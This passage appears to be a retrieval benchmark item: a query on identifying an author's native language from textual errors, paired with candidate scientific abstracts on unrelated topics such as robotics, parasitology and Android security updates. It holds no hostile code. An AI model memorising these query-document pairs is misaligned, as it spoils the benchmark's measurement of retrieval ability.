"text": "A high fidelity biomimetic hand actuated by 9 stepper motors packaged within forearm casing was manufactured for less than 350 USD; it has 18 mechanical degrees of freedom, is 38 cm long, weighs 2.2 kg. The hand model has 3D printed replicas of human bones and laser cut tendons and ligaments. The user intent is deduced from EEG and EMG signals, obtained by Neurosky and Myoware commercial sensors, respectively. Three distinct EEG patterns trigger pinch, hook, and point actions. EMG signals are used for finer motor control, e.g. strength of grip. A pilot test study on three subjects showed that EMG can actuate the hand with an 80% success rate, while EEG allows for a 68% success rate. The system proved its robustness at the 2017 Cambridge Science Festival, using EEG signals alone. Out of approximately 30 visitors the majority could generate a “peace” sign after 1 to 2 minutes.",
"title": ""
},
{
"docid": "dd1e7e027d88e58f9c85c8a43482b404",
"text": "Strepsiptera are obligate endoparasitoids that exhibit extreme sexual dimorphism and parasitize seven orders and 33 families of Insecta. The adult males and the first instar larvae in the Mengenillidia and Stylopidia are free-living, whereas the adult females in Mengenillidia are free-living but in the suborder Stylopidia they remain endoparasitic in the host. Parasitism occurs at the host larval/nymphal stage and continues in a mobile host until that host's adult stage. The life of the host is lengthened to allow the male strepsipteran to complete maturation and the viviparous female to release the first instar larvae when the next generation of the host's larvae/nymphs has been produced. The ability of strepsipterans to parasitize a wide range of hosts, in spite of being endoparasitoids, is perhaps due to their unique immune avoidance system. Aspects of virulence, heterotrophic heteronomy in the family Myrmecolacidae, cryptic species, genomics, immune response, and behavior of stylopized hosts are discussed in this chapter.",
"title": ""
},
{
"docid": "0cb34c6202328c57dbd1e8e7270d8aa6",
"text": "Optimization of deep learning is no longer an imminent problem, due to various gradient descent methods and the improvements of network structure, including activation functions, the connectivity style, and so on. Then the actual application depends on the generalization ability, which determines whether a network is effective. Regularization is an efficient way to improve the generalization ability of deep CNN, because it makes it possible to train more complex models while maintaining a lower overfitting. In this paper, we propose to optimize the feature boundary of deep CNN through a two-stage training method (pre-training process and implicit regularization training process) to reduce the overfitting problem. In the pre-training stage, we train a network model to extract the image representation for anomaly detection. In the implicit regularization training stage, we re-train the network based on the anomaly detection results to regularize the feature boundary and make it converge in the proper position. Experimental results on five image classification benchmarks show that the two-stage training method achieves a state-of-the-art performance and that it, in conjunction with more complicated anomaly detection algorithm, obtains better results. Finally, we use a variety of strategies to explore and analyze how implicit regularization plays a role in the two-stage training process. Furthermore, we explain how implicit regularization can be interpreted as data augmentation and model ensemble.",
"title": ""
},
{
"docid": "835309dca26f0c3fc5a750f9957092da",
"text": "Offline training and testing are playing an essential role in design and evaluation of intelligent vehicle vision algorithms. Nevertheless, long-term inconvenience concerning traditional image datasets is that manually collecting and annotating datasets from real scenes lack testing tasks and diverse environmental conditions. For that virtual datasets can make up for these regrets. In this paper, we propose to construct artificial scenes for evaluating the visual intelligence of intelligent vehicles and generate a new virtual dataset called “ParallelEye-CS”. First of all, the actual track map data is used to build 3D scene model of Chinese Flagship Intelligent Vehicle Proving Center Area, Changshu. Then, the computer graphics and virtual reality technologies are utilized to simulate the virtual testing tasks according to the Chinese Intelligent Vehicles Future Challenge (IVFC) tasks. Furthermore, the Unity3D platform is used to generate accurate ground-truth labels and change environmental conditions. As a result, we present a viable implementation method for constructing artificial scenes for traffic vision research. The experimental results show that our method is able to generate photorealistic virtual datasets with diverse testing tasks.",
"title": ""
},
{
"docid": "5a3f542176503ddc6fcbd0fe29f08869",
"text": "INTRODUCTION\nArtificial intelligence is a branch of computer science capable of analysing complex medical data. Their potential to exploit meaningful relationship with in a data set can be used in the diagnosis, treatment and predicting outcome in many clinical scenarios.\n\n\nMETHODS\nMedline and internet searches were carried out using the keywords 'artificial intelligence' and 'neural networks (computer)'. Further references were obtained by cross-referencing from key articles. An overview of different artificial intelligent techniques is presented in this paper along with the review of important clinical applications.\n\n\nRESULTS\nThe proficiency of artificial intelligent techniques has been explored in almost every field of medicine. Artificial neural network was the most commonly used analytical tool whilst other artificial intelligent techniques such as fuzzy expert systems, evolutionary computation and hybrid intelligent systems have all been used in different clinical settings.\n\n\nDISCUSSION\nArtificial intelligence techniques have the potential to be applied in almost every field of medicine. There is need for further clinical trials which are appropriately designed before these emergent techniques find application in the real clinical setting.",
"title": ""
},
{
"docid": "22646672196b49cc0fde4b6c6e187fd1",
"text": "There is a tremendous increase in the research of data mining. Data mining is the process of extraction of data from large database. Knowledge Discovery in database (KDD) is another name of data mining. Privacy protection has become a necessary requirement in many data mining applications due to emerging privacy legislation and regulations. One of the most important topics in research community is Privacy Preserving Data Mining (PPDM). Privacy preserving data mining (PPDM) deals with protecting the privacy of individual data or sensitive knowledge without sacrificing the utility of the data. The Success of Privacy Preserving data mining algorithms is measured in terms of its performance, data utility, level of uncertainty or resistance to data mining algorithms etc. In this paper we will review on various privacy preserving techniques like Data perturbation, condensation etc.",
"title": ""
},
{
"docid": "b02739fef8a910d0a97c6f4ff1636b06",
"text": "To operate in human-robot coexisting environments, intelligent robots need to simultaneously reason with commonsense knowledge and plan under uncertainty. Markov decision processes (MDPs) and partially observable MDPs (POMDPs), are good at planning under uncertainty toward maximizing long-term rewards; P-LOG, a declarative programming language under Answer Set semantics, is strong in commonsense reasoning. In this paper, we present a novel algorithm called iCORPP to dynamically reason about, and construct (PO)MDPs using P-LOG. iCORPP successfully shields exogenous domain attributes from (PO)MDPs, which limits computational complexity and enables (PO)MDPs to adapt to the value changes these attributes produce. We conduct a number of experimental trials using two example problems in simulation and demonstrate iCORPP on a real robot. Results show significant improvements compared to competitive baselines.",
"title": ""
},
{
"docid": "03550fad9c5f21c69253f2bfc389fccc",
"text": "The design of a Ka dual-band circular polarizer by inserting a dielectric septum in the middle of the circular waveguide is discussed here. The dielectric septum is located in fixing slots, and by adjusting the dimension of the dual-compensation slots which are built in the orthogonal plane, the phase difference of 90deg at the center frequency for the dual-band can be achieved. Furthermore, the gradual changing structures at both ends of the dielectric septum are built for impedance matching for both Ex and Ey polarizations. The simple structure of this kind of polarizer can reduce the influence of manufacturing inaccuracy in the Ka-band. The measured phase difference is within 90degplusmn 4.5deg for both bands. In addition, the return losses for both Ex and Ey polarizations are better than -15 dB.",
"title": ""
},
{
"docid": "48903eded4e1a88114e3917e2e6173b6",
"text": "The problem of generating maps with mobile robots has received considerable attention over the past years. Most of the techniques developed so far have been designed for situations in which the environment is static during the mapping process. Dynamic objects, however, can lead to serious errors in the resulting maps such as spurious objects or misalignments due to localization errors. In this paper we consider the problem of creating maps with mobile robots in dynamic environments. We present a new approach that interleaves mapping and localization with a probabilistic technique to identify spurious measurements. In several experiments we demonstrate that our algorithm generates accurate 2d and 3d in different kinds of dynamic indoor and outdoor environments. We also use our algorithm to isolate the dynamic objects and to generate three-dimensional representation of them.",
"title": ""
},
{
"docid": "d5c3e1baa2425616154e9d5252e7d393",
"text": "Article history: Available online 18 June 2010",
"title": ""
},
{
"docid": "2d56fdb56ede1b5745db9031a411df5c",
"text": "Reconstructed 3D human epidermal skin models are being used increasingly for safety testing of chemicals. Based on EpiDerm™ tissues, an assay was developed in which the tissues were topically exposed to test chemicals for 3h followed by cell isolation and assessment of DNA damage using the comet assay. Inter-laboratory reproducibility of the 3D skin comet assay was initially demonstrated using two model genotoxic carcinogens, methyl methane sulfonate (MMS) and 4-nitroquinoline-n-oxide, and the results showed good concordance among three different laboratories and with in vivo data. In Phase 2 of the project, intra- and inter-laboratory reproducibility was investigated with five coded compounds with different genotoxicity liability tested at three different laboratories. For the genotoxic carcinogens MMS and N-ethyl-N-nitrosourea, all laboratories reported a dose-related and statistically significant increase (P < 0.05) in DNA damage in every experiment. For the genotoxic carcinogen, 2,4-diaminotoluene, the overall result from all laboratories showed a smaller, but significant genotoxic response (P < 0.05). For cyclohexanone (CHN) (non-genotoxic in vitro and in vivo, and non-carcinogenic), an increase compared to the solvent control acetone was observed only in one laboratory. However, the response was not dose related and CHN was judged negative overall, as was p-nitrophenol (p-NP) (genotoxic in vitro but not in vivo and non-carcinogenic), which was the only compound showing clear cytotoxic effects. For p-NP, significant DNA damage generally occurred only at doses that were substantially cytotoxic (>30% cell loss), and the overall response was comparable in all laboratories despite some differences in doses tested. The results of the collaborative study for the coded compounds were generally reproducible among the laboratories involved and intra-laboratory reproducibility was also good. These data indicate that the comet assay in EpiDerm™ skin models is a promising model for the safety assessment of compounds with a dermal route of exposure.",
"title": ""
},
{
"docid": "1123b7c561945627289923a0ad9df53e",
"text": "Concluding his provocative 1989 essay delineating how Charlotte Perkins Gilman’s “The Yellow Wallpaper” functions as a Gothic allegory, Greg Johnson describes Gilman’s achievement as yet awaiting its “due recognition” and her compelling short story as being “[s]till under-read, still haunting the margins of the American literary canon” (530). Working from the premise that Gilman’s tale “adroitly and at times parodically employs Gothic conventions to present an allegory of literary imagination unbinding the social, domestic, and psychological confinements of a nineteenth-century woman writer,” Johnson provides a fairly satisfactory general overview of “The Yellow Wallpaper” as a Gothic production (522). Despite the disputable claim that Gilman’s story functions, in part, as a Gothic parody, he correctly identifies and aptly elucidates several of the most familiar Gothic themes at work in this study— specifically “confinement and rebellion, forbidden desire and ‘irrational’ fear”—alongside such traditional Gothic elements as “the distraught heroine, the forbidding mansion, and the powerfully repressive male antagonist” (522). Johnson ultimately overlooks,",
"title": ""
},
{
"docid": "1f6e92bc8239e358e8278d13ced4a0a9",
"text": "This paper proposes a method for hand pose estimation from RGB images that uses both external large-scale depth image datasets and paired depth and RGB images as privileged information at training time. We show that providing depth information during training significantly improves performance of pose estimation from RGB images during testing. We explore different ways of using this privileged information: (1) using depth data to initially train a depth-based network, (2) using the features from the depthbased network of the paired depth images to constrain midlevel RGB network weights, and (3) using the foreground mask, obtained from the depth data, to suppress the responses from the background area. By using paired RGB and depth images, we are able to supervise the RGB-based network to learn middle layer features that mimic that of the corresponding depth-based network, which is trained on large-scale, accurately annotated depth data. During testing, when only an RGB image is available, our method produces accurate 3D hand pose predictions. Our method is also tested on 2D hand pose estimation. Experiments on three public datasets show that the method outperforms the state-of-the-art methods for hand pose estimation using RGB image input.",
"title": ""
},
{
"docid": "8fbec2539107e58a6cd4e6266dc20ccc",
"text": "The Indoor flights of UAV (Unmanned Aerial Vehicle) are susceptible to impacts of multiples obstacles and walls. The most basic controller that a drone requires in order to achieve indoor flight, is a controller that can maintain the drone flying in the same site, this is called hovering control. This paper presents a fuzzy PID controller for hovering. The control system to modify the gains of the parameters of the PID controllers in the x and y axes as a function of position and error in each axis, of a known environment. Flight tests were performed over an AR.Drone 2.0, comparing RMSE errors of hovering with classical PID and fuzzy PID under disturbances. The fuzzy PID controller reduced the average error from 11 cm to 8 cm in a 3 minutes test. This result is an improvement over previously published works.",
"title": ""
},
{
"docid": "eded1c6b0eb12705e7528fe34aa994cf",
"text": "We develop a novel probabilistic generative model based on the variational autoencoder approach. Notable aspects of our architecture are: a novel way of specifying the latent variables prior, and the introduction of an ordinality enforcing unit. We describe how to do supervised, unsupervised and semi-supervised learning, and nominal and ordinal classification, with the model. We analyze generative properties of the approach, and the classification effectiveness under nominal and ordinal classification, using two benchmark datasets. Our results show that our model can achieve comparable results with relevant baselines in both of the classification tasks.",
"title": ""
},
{
"docid": "4a7915450629440d68fb6ae05692344e",
"text": "Sample size justification is an important consideration when planning a clinical trial, not only for the main trial but also for any preliminary pilot trial. When the outcome is a continuous variable, the sample size calculation requires an accurate estimate of the standard deviation of the outcome measure. A pilot trial can be used to get an estimate of the standard deviation, which could then be used to anticipate what may be observed in the main trial. However, an important consideration is that pilot trials often estimate the standard deviation parameter imprecisely. This paper looks at how we can choose an external pilot trial sample size in order to minimise the sample size of the overall clinical trial programme, that is, the pilot and the main trial together. We produce a method of calculating the optimal solution to the required pilot trial sample size when the standardised effect size for the main trial is known. However, as it may not be possible to know the standardised effect size to be used prior to the pilot trial, approximate rules are also presented. For a main trial designed with 90% power and two-sided 5% significance, we recommend pilot trial sample sizes per treatment arm of 75, 25, 15 and 10 for standardised effect sizes that are extra small (≤0.1), small (0.2), medium (0.5) or large (0.8), respectively.",
"title": ""
},
{
"docid": "8d581aef7779713f3cb9f236fb83d7ff",
"text": "Sandro Botticelli was one of the most esteemed painters and draughtsmen among Renaissance artists. Under the patronage of the De' Medici family, he was active in Florence during the flourishing of the Renaissance trend towards the reclamation of lost medical and anatomical knowledge of ancient times through the dissection of corpses. Combining the typical attributes of the elegant courtly style with hallmarks derived from the investigation and analysis of classical templates, he left us immortal masterpieces, the excellence of which incomprehensibly waned and was rediscovered only in the 1890s. Few know that it has already been reported that Botticelli concealed the image of a pair of lungs in his masterpiece, The Primavera. The present investigation provides evidence that Botticelli embedded anatomic imagery of the lung in another of his major paintings, namely, The Birth of Venus. Both canvases were most probably influenced and enlightened by the neoplatonic philosophy of the humanist teachings in the De' Medici's circle, and they represent an allegorical celebration of the cycle of life originally generated by the Divine Wind or Breath. This paper supports the theory that because of the anatomical knowledge to which he was exposed, Botticelli aimed to enhance the iconographical meaning of both the masterpieces by concealing images of the lung anatomy within them.",
"title": ""
}
] | scidocsrr |
62bd0a9d7b5e165a63d837e60067ac8b | Determining an author's native language by mining a text for errors | [
{
"docid": "be90932dfddcf02b33fc2ef573b8c910",
"text": "Style-based Text Categorization: What Newspaper Am I Reading?",
"title": ""
}
] | [
{
"docid": "5fe1fa98c953d778ee27a104802e5f2b",
"text": "We describe two general approaches to creating document-level maps of science. To create a local map one defines and directly maps a sample of data, such as all literature published in a set of information science journals. To create a global map of a research field one maps ‘all of science’ and then locates a literature sample within that full context. We provide a deductive argument that global mapping should create more accurate partitions of a research field than local mapping, followed by practical reasons why this may not be so. The field of information science is then mapped at the document level using both local and global methods to provide a case illustration of the differences between the methods. Textual coherence is used to assess the accuracies of both maps. We find that document clusters in the global map have significantly higher coherence than those in the local map, and that the global map provides unique insights into the field of information science that cannot be discerned from the local map. Specifically, we show that information science and computer science have a large interface and that computer science is the more progressive discipline at that interface. We also show that research communities in temporally linked threads have a much higher coherence than isolated communities, and that this feature can be used to predict which threads will persist into a subsequent year. Methods that could increase the accuracy of both local and global maps in the future are also discussed.",
"title": ""
},
{
"docid": "c2c2ddb9a6e42edcc1c035636ec1c739",
"text": "As the interest in DevOps continues to grow, there is an increasing need for software organizations to understand how to adopt it successfully. This study has as objective to clarify the concept and provide insight into existing challenges of adopting DevOps. First, the existing literature is reviewed. A definition of DevOps is then formed based on the literature by breaking down the concept into its defining characteristics. We interview 13 subjects in a software company adopting DevOps and, finally, we present 11 impediments for the company’s DevOps adoption that were identified based on the interviews.",
"title": ""
},
{
"docid": "8788f14a2615f3065f4f0656a4a66592",
"text": "The ability to communicate in natural language has long been considered a defining characteristic of human intelligence. Furthermore, we hold our ability to express ideas in writing as a pinnacle of this uniquely human language facility—it defies formulaic or algorithmic specification. So it comes as no surprise that attempts to devise computer programs that evaluate writing are often met with resounding skepticism. Nevertheless, automated writing-evaluation systems might provide precisely the platforms we need to elucidate many of the features that characterize good and bad writing, and many of the linguistic, cognitive, and other skills that underlie the human capacity for both reading and writing. Using computers to increase our understanding of the textual features and cognitive skills involved in creating and comprehending written text will have clear benefits. It will help us develop more effective instructional materials for improving reading, writing, and other human communication abilities. It will also help us develop more effective technologies, such as search engines and questionanswering systems, for providing universal access to electronic information. A sketch of the brief history of automated writing-evaluation research and its future directions might lend some credence to this argument.",
"title": ""
},
{
"docid": "d8cd13bcd43052550dbfdc0303ef2bc7",
"text": "We study the Shannon capacity of adaptive transmission techniques in conjunction with diversity combining. This capacity provides an upper bound on spectral efficiency using these techniques. We obtain closed-form solutions for the Rayleigh fading channel capacity under three adaptive policies: optimal power and rate adaptation, constant power with optimal rate adaptation, and channel inversion with fixed rate. Optimal power and rate adaptation yields a small increase in capacity over just rate adaptation, and this increase diminishes as the average received carrier-to-noise ratio (CNR) or the number of diversity branches increases. Channel inversion suffers the largest capacity penalty relative to the optimal technique, however, the penalty diminishes with increased diversity. Although diversity yields large capacity gains for all the techniques, the gain is most pronounced with channel inversion. For example, the capacity using channel inversion with two-branch diversity exceeds that of a single-branch system using optimal rate and power adaptation. Since channel inversion is the least complex scheme to implement, there is a tradeoff between complexity and capacity for the various adaptation methods and diversity-combining techniques.",
"title": ""
},
{
"docid": "c43de372dac79cf922f560450545e5b3",
"text": "Unsupervised learning and supervised learning are key research topics in deep learning. However, as high-capacity supervised neural networks trained with a large amount of labels have achieved remarkable success in many computer vision tasks, the availability of large-scale labeled images reduced the significance of unsupervised learning. Inspired by the recent trend toward revisiting the importance of unsupervised learning, we investigate joint supervised and unsupervised learning in a large-scale setting by augmenting existing neural networks with decoding pathways for reconstruction. First, we demonstrate that the intermediate activations of pretrained large-scale classification networks preserve almost all the information of input images except a portion of local spatial details. Then, by end-to-end training of the entire augmented architecture with the reconstructive objective, we show improvement of the network performance for supervised tasks. We evaluate several variants of autoencoders, including the recently proposed “what-where\" autoencoder that uses the encoder pooling switches, to study the importance of the architecture design. Taking the 16-layer VGGNet trained under the ImageNet ILSVRC 2012 protocol as a strong baseline for image classification, our methods improve the validation-set accuracy by a noticeable margin.",
"title": ""
},
{
"docid": "c0e157abffae2a861346017fd0257668",
"text": "We present a comprehensive approach to handle perception uncertainty to reduce failure rates in robotic bin-picking. Our focus is on mixed-bins. We identify the main failure modes at various stages of the binpicking task and present methods to recover from them. If uncertainty in part detection leads to perception failure, then human intervention is invoked. Our approach estimates the confidence in the part match provided by an automated perception system, which is used to detect perception failures. Human intervention is also invoked if uncertainty in estimated part location and orientation leads to a singulation planning failure. We have developed a user interface that enables remote human interventions when necessary. Finally, if uncertainty in part posture in the gripper leads to failure in placing the part with the desired accuracy, sensor-less fine-positioning moves are used to correct the final placement errors. We have developed a fine-positioning planner with a suite of fine-motion strategies that offer different tradeoffs between completion time and postural accuracy at the destination. We report our observations from system characterization experiments with a dual-armed Baxter robot, equipped with a Ensenso three-dimensional camera, to perform bin-picking on mixed-bins. & 2016 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "d5007c061227ec76a4e8ea795471db00",
"text": "The ramp loss is a robust but non-convex loss for classification. Compared with other non-convex losses, a local minimum of the ramp loss can be effectively found. The effectiveness of local search comes from the piecewise linearity of the ramp loss. Motivated by the fact that the `1-penalty is piecewise linear as well, the `1-penalty is applied for the ramp loss, resulting in a ramp loss linear programming support vector machine (rampLPSVM). The proposed ramp-LPSVM is a piecewise linear minimization problem and the related optimization techniques are applicable. Moreover, the `1-penalty can enhance the sparsity. In this paper, the corresponding misclassification error and convergence behavior are discussed. Generally, the ramp loss is a truncated hinge loss. Therefore ramp-LPSVM possesses some similar properties as hinge loss SVMs. A local minimization algorithm and a global search strategy are discussed. The good optimization capability of the proposed algorithms makes ramp-LPSVM perform well in numerical experiments: the result of rampLPSVM is more robust than that of hinge SVMs and is sparser than that of ramp-SVM, which consists of the ‖ · ‖K-penalty and the ramp loss.",
"title": ""
},
{
"docid": "c96dbf6084741f8b529e8a1de19cf109",
"text": "Metamorphic testing is an advanced technique to test programs without a true test oracle such as machine learning applications. Because these programs have no general oracle to identify their correctness, traditional testing techniques such as unit testing may not be helpful for developers to detect potential bugs. This paper presents a novel system, Kabu, which can dynamically infer properties of methods' states in programs that describe the characteristics of a method before and after transforming its input. These Metamorphic Properties (MPs) are pivotal to detecting potential bugs in programs without test oracles, but most previous work relies solely on human effort to identify them and only considers MPs between input parameters and output result (return value) of a program or method. This paper also proposes a testing concept, Metamorphic Differential Testing (MDT). By detecting different sets of MPs between different versions for the same method, Kabu reports potential bugs for human review. We have performed a preliminary evaluation of Kabu by comparing the MPs detected by humans with the MPs detected by Kabu. Our preliminary results are promising: Kabu can find more MPs than human developers, and MDT is effective at detecting function changes in methods.",
"title": ""
},
{
"docid": "dd52742343462b3106c18274c143928b",
"text": "This paper presents a descriptive account of the social practices surrounding the iTunes music sharing of 13 participants in one organizational setting. Specifically, we characterize adoption, critical mass, and privacy; impression management and access control; the musical impressions of others that are created as a result of music sharing; the ways in which participants attempted to make sense of the dynamic system; and implications of the overlaid technical, musical, and corporate topologies. We interleave design implications throughout our results and relate those results to broader themes in a music sharing design space.",
"title": ""
},
{
"docid": "45fb31643f4fd53b08c51818f284f2df",
"text": "This paper introduces a new type of fuzzy inference systems, denoted as dynamic evolving neural-fuzzy inference system (DENFIS), for adaptive online and offline learning, and their application for dynamic time series prediction. DENFIS evolve through incremental, hybrid (supervised/unsupervised), learning, and accommodate new input data, including new features, new classes, etc., through local element tuning. New fuzzy rules are created and updated during the operation of the system. At each time moment, the output of DENFIS is calculated through a fuzzy inference system based on -most activated fuzzy rules which are dynamically chosen from a fuzzy rule set. Two approaches are proposed: 1) dynamic creation of a first-order Takagi–Sugeno-type fuzzy rule set for a DENFIS online model; and 2) creation of a first-order Takagi–Sugeno-type fuzzy rule set, or an expanded high-order one, for a DENFIS offline model. A set of fuzzy rules can be inserted into DENFIS before or during its learning process. Fuzzy rules can also be extracted during or after the learning process. An evolving clustering method (ECM), which is employed in both online and offline DENFIS models, is also introduced. It is demonstrated that DENFIS can effectively learn complex temporal sequences in an adaptive way and outperform some well-known, existing models.",
"title": ""
},
{
"docid": "fc32d0734ea83a4252339c6a2f98b0ee",
"text": "The security of Android depends on the timely delivery of updates to fix critical vulnerabilities. In this paper we map the complex network of players in the Android ecosystem who must collaborate to provide updates, and determine that inaction by some manufacturers and network operators means many handsets are vulnerable to critical vulnerabilities. We define the FUM security metric to rank the performance of device manufacturers and network operators, based on their provision of updates and exposure to critical vulnerabilities. Using a corpus of 20 400 devices we show that there is significant variability in the timely delivery of security updates across different device manufacturers and network operators. This provides a comparison point for purchasers and regulators to determine which device manufacturers and network operators provide security updates and which do not. We find that on average 87.7% of Android devices are exposed to at least one of 11 known critical vulnerabilities and, across the ecosystem as a whole, assign a FUM security score of 2.87 out of 10. In our data, Nexus devices do considerably better than average with a score of 5.17; and LG is the best manufacturer with a score of 3.97.",
"title": ""
},
{
"docid": "c956c6d99053b44557cfed93f12dc1bc",
"text": "We present a device demonstrating a lithographically patterned transmon integrated with a micromachined cavity resonator. Our two-cavity, one-qubit device is a multilayer microwave-integrated quantum circuit (MMIQC), comprising a basic unit capable of performing circuit-QED operations. We describe the qubit-cavity coupling mechanism of a specialized geometry using an electric-field picture and a circuit model, and obtain specific system parameters using simulations. Fabrication of the MMIQC includes lithography, etching, and metallic bonding of silicon wafers. Superconducting wafer bonding is a critical capability that is demonstrated by a micromachined storage-cavity lifetime of 34.3 μs, corresponding to a quality factor of 2 × 10 at single-photon energies. The transmon coherence times are T1 1⁄4 6.4 μs, and Techo 2 1⁄4 11.7 μs. We measure qubit-cavity dispersive coupling with a rate χqμ=2π 1⁄4 −1.17 MHz, constituting a Jaynes-Cummings system with an interaction strength g=2π 1⁄4 49 MHz. With these parameters we are able to demonstrate circuit-QED operations in the strong dispersive regime with ease. Finally, we highlight several improvements and anticipated extensions of the technology to complex MMIQCs.",
"title": ""
},
{
"docid": "ff0e93146ae9e6c099a27228d1735422",
"text": "The prevalence of big data technology has generated increasing demands in large-scale streaming data processing. However, for certain tasks it is still challenging to appropriately select a platform due to the diversity of choices and the complexity of configurations. This paper focuses on benchmarking some principal streaming platforms. We achieve our goals on StreamBench, a streaming benchmark tool based on which we introduce proper modifications and extensions. We then accomplish performance comparisons among different big data platforms, including Apache Spark, Apache Storm and Apache Samza. In terms of performance criteria, we consider both computational capability and fault-tolerance ability. Finally, we give a summary on some key knobs for performance tuning as well as on hardware utilization.",
"title": ""
},
{
"docid": "bf4b6cd15c0b3ddb5892f1baea9dec68",
"text": "The purpose of this study was to examine the distribution, abundance and characteristics of plastic particles in plankton samples collected routinely in Northeast Pacific ecosystems, and to contribute to the development of ideas for future research into the occurrence and impact of small plastic debris in marine pelagic ecosystems. Plastic debris particles were assessed from zooplankton samples collected as part of the National Oceanic and Atmospheric Administration's (NOAA) ongoing ecosystem surveys during two research cruises in the Southeast Bering Sea in the spring and fall of 2006 and four research cruises off the U.S. west coast (primarily off southern California) in spring, summer and fall of 2006, and in January of 2007. Nets with 0.505 mm mesh were used to collect surface samples during all cruises, and sub-surface samples during the four cruises off the west coast. The 595 plankton samples processed indicate that plastic particles are widely distributed in surface waters. The proportion of surface samples from each cruise that contained particles of plastic ranged from 8.75 to 84.0%, whereas particles were recorded in sub-surface samples from only one cruise (in 28.2% of the January 2007 samples). Spatial and temporal variability was apparent in the abundance and distribution of the plastic particles and mean standardized quantities varied among cruises with ranges of 0.004-0.19 particles/m³, and 0.014-0.209 mg dry mass/m³. Off southern California, quantities for the winter cruise were significantly higher, and for the spring cruise significantly lower than for the summer and fall surveys (surface data). Differences between surface particle concentrations and mass for the Bering Sea and California coast surveys were significant for pair-wise comparisons of the spring but not the fall cruises. The particles were assigned to three plastic product types: product fragments, fishing net and line fibers, and industrial pellets; and five size categories: <1 mm, 1-2.5 mm, >2.5-5 mm, >5-10 mm, and >10 mm. Product fragments accounted for the majority of the particles, and most were less than 2.5 mm in size. The ubiquity of such particles in the survey areas and predominance of sizes <2.5 mm implies persistence in these pelagic ecosystems as a result of continuous breakdown from larger plastic debris fragments, and widespread distribution by ocean currents. Detailed investigations of the trophic ecology of individual zooplankton species, and their encounter rates with various size ranges of plastic particles in the marine pelagic environment, are required in order to understand the potential for ingestion of such debris particles by these organisms. Ongoing plankton sampling programs by marine research institutes in large marine ecosystems are good potential sources of data for continued assessment of the abundance, distribution and potential impact of small plastic debris in productive coastal pelagic zones.",
"title": ""
},
{
"docid": "6646b66370ed02eb84661c8505eb7563",
"text": "Re-identification is generally carried out by encoding the appearance of a subject in terms of outfit, suggesting scenarios where people do not change their attire. In this paper we overcome this restriction, by proposing a framework based on a deep convolutional neural network, SOMAnet, that additionally models other discriminative aspects, namely, structural attributes of the human figure (e.g. height, obesity, gender). Our method is unique in many respects. First, SOMAnet is based on the Inception architecture, departing from the usual siamese framework. This spares expensive data preparation (pairing images across cameras) and allows the understanding of what the network learned. Second, and most notably, the training data consists of a synthetic 100K instance dataset, SOMAset, created by photorealistic human body generation software. Synthetic data represents a good compromise between realistic imagery, usually not required in re-identification since surveillance cameras capture low-resolution silhouettes, and complete control of the samples, which is useful in order to customize the data w.r.t. the surveillance scenario at-hand, e.g. ethnicity. SOMAnet, trained on SOMAset and fine-tuned on recent re-identification benchmarks, outperforms all competitors, matching subjects even with different apparel. The combination of synthetic data with Inception architectures opens up new research avenues in re-identification.",
"title": ""
},
{
"docid": "569700bd1114b1b93a13af25b2051631",
"text": "Empathy and sympathy play crucial roles in much of human social interaction and are necessary components for healthy coexistence. Sympathy is thought to be a proxy for motivating prosocial behavior and providing the affective and motivational base for moral development. The purpose of the present study was to use functional MRI to characterize developmental changes in brain activation in the neural circuits underpinning empathy and sympathy. Fifty-seven individuals, whose age ranged from 7 to 40 years old, were presented with short animated visual stimuli depicting painful and non-painful situations. These situations involved either a person whose pain was accidentally caused or a person whose pain was intentionally inflicted by another individual to elicit empathic (feeling as the other) or sympathetic (feeling concern for the other) emotions, respectively. Results demonstrate monotonic age-related changes in the amygdala, supplementary motor area, and posterior insula when participants were exposed to painful situations that were accidentally caused. When participants observed painful situations intentionally inflicted by another individual, age-related changes were detected in the dorsolateral prefrontal and ventromedial prefrontal cortex, with a gradual shift in that latter region from its medial to its lateral portion. This pattern of activation reflects a change from a visceral emotional response critical for the analysis of the affective significance of stimuli to a more evaluative function. Further, these data provide evidence for partially distinct neural mechanisms subserving empathy and sympathy, and demonstrate the usefulness of a developmental neurobiological approach to the new emerging area of moral neuroscience.",
"title": ""
},
{
"docid": "bf0b08e7d39646a72f92b7fda791e33b",
"text": "Knowledge distillation (KD) aims to train a lightweight classifier suitable to provide accurate inference with constrained resources in multi-label learning. Instead of directly consuming feature-label pairs, the classifier is trained by a teacher, i.e., a high-capacity model whose training may be resource-hungry. The accuracy of the classifier trained this way is usually suboptimal because it is difficult to learn the true data distribution from the teacher. An alternative method is to adversarially train the classifier against a discriminator in a two-player game akin to generative adversarial networks (GAN), which can ensure the classifier to learn the true data distribution at the equilibrium of this game. However, it may take excessively long time for such a two-player game to reach equilibrium due to high-variance gradient updates. To address these limitations, we propose a three-player game named KDGAN consisting of a classifier, a teacher, and a discriminator. The classifier and the teacher learn from each other via distillation losses and are adversarially trained against the discriminator via adversarial losses. By simultaneously optimizing the distillation and adversarial losses, the classifier will learn the true data distribution at the equilibrium. We approximate the discrete distribution learned by the classifier (or the teacher) with a concrete distribution. From the concrete distribution, we generate continuous samples to obtain low-variance gradient updates, which speed up the training. Extensive experiments using real datasets confirm the superiority of KDGAN in both accuracy and training speed.",
"title": ""
},
{
"docid": "e2630765e2fa4b203a4250cb5b69b9e9",
"text": "Thirteen years have passed since Karl Sims published his work onevolving virtual creatures. Since then,several novel approaches toneural network evolution and genetic algorithms have been proposed.The aim of our work is to apply recent results in these areas tothe virtual creatures proposed by Karl Sims, leading to creaturescapable of solving more complex tasks. This paper presents oursuccess in reaching the first milestone -a new and completeimplementation of the original virtual creatures. All morphologicaland control properties of the original creatures were implemented.Laws of physics are simulated using ODE library. Distributedcomputation is used for CPU-intensive tasks, such as fitnessevaluation.Experiments have shown that our system is capable ofevolving both morphology and control of the creatures resulting ina variety of non-trivial swimming and walking strategies.",
"title": ""
},
{
"docid": "0847b2b9270bc39a1273edfdfa022345",
